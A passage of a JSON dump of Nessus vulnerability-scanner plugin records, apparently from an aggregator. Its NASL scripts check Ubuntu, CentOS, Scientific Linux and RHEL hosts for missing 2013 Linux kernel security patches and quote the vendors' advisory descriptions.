script_cve_id(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\");\n script_bugtraq_id(57433, 57740, 57743, 57744, 57838, 57964, 58053, 58071, 58112);\n script_xref(name:\"USN\", value:\"1769-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerabilities (USN-1769-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels\nhandling of datagrams packets when the MSG_PEEK flag is specified. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system hang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1769-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1769-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-26-generic\", pkgver:\"3.5.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-26-highbank\", pkgver:\"3.5.0-26.42\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:35", "description": "Updated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.", "edition": 25, "published": "2013-03-15T00:00:00", "title": "CentOS 6 : kernel (CESA-2013:0630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "modified": "2013-03-15T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2013-0630.NASL", "href": "https://www.tenable.com/plugins/nessus/65554", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0630 and \n# CentOS Errata and Security Advisory 2013:0630 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65554);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\");\n script_bugtraq_id(57838, 57940);\n script_xref(name:\"RHSA\", value:\"2013:0630\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2013:0630)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019646.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76b0c9ff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0228\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-devel / kernel-devel / etc\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:47:28", "description": "This update fixes the following security issues :\n\n - A flaw was found in the way the xen_iret() function in\n the Linux kernel used the DS (the CPU's Data Segment)\n register. A local, unprivileged user in a 32-bit,\n para-virtualized Xen hypervisor guest could use this\n flaw to crash the guest or, potentially, escalate their\n privileges. (CVE-2013-0228, Important)\n\n - A flaw was found in the way file permission checks for\n the '/dev/cpu/[x]/msr' files were performed in\n restricted root environments (for example, when using a\n capability-based security model). A local user with the\n ability to write to these files could use this flaw to\n escalate their privileges to kernel level, for example,\n by writing to the SYSENTER_EIP_MSR register.\n (CVE-2013-0268, Important)\n\nThe system must be rebooted for this update to take effect.", "edition": 16, "published": "2013-03-15T00:00:00", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20130312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "modified": "2013-03-15T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf"], "id": "SL_20130312_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65564", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65564);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20130312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issues :\n\n - A flaw was found in the way the xen_iret() function in\n the Linux kernel used the DS (the CPU's Data Segment)\n register. A local, unprivileged user in a 32-bit,\n para-virtualized Xen hypervisor guest could use this\n flaw to crash the guest or, potentially, escalate their\n privileges. (CVE-2013-0228, Important)\n\n - A flaw was found in the way file permission checks for\n the '/dev/cpu/[x]/msr' files were performed in\n restricted root environments (for example, when using a\n capability-based security model). A local user with the\n ability to write to these files could use this flaw to\n escalate their privileges to kernel level, for example,\n by writing to the SYSENTER_EIP_MSR register.\n (CVE-2013-0268, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=4386\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e780f94\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-358.2.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-358.2.1.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:10", "description": "Updated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way the xen_iret() function in the Linux\nkernel used the DS (the CPU's Data Segment) register. A local,\nunprivileged user in a 32-bit, para-virtualized Xen hypervisor guest\ncould use this flaw to crash the guest or, potentially, escalate their\nprivileges. (CVE-2013-0228, Important)\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs noted in\nthe Technical Notes. The system must be rebooted for this update to\ntake effect.", "edition": 26, "published": "2013-03-13T00:00:00", "title": "RHEL 6 : kernel (RHSA-2013:0630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "modified": "2013-03-13T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2013-0630.NASL", "href": "https://www.tenable.com/plugins/nessus/65237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0630. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65237);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\");\n script_bugtraq_id(57838, 57940);\n script_xref(name:\"RHSA\", value:\"2013:0630\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2013:0630)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues and several bugs\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update 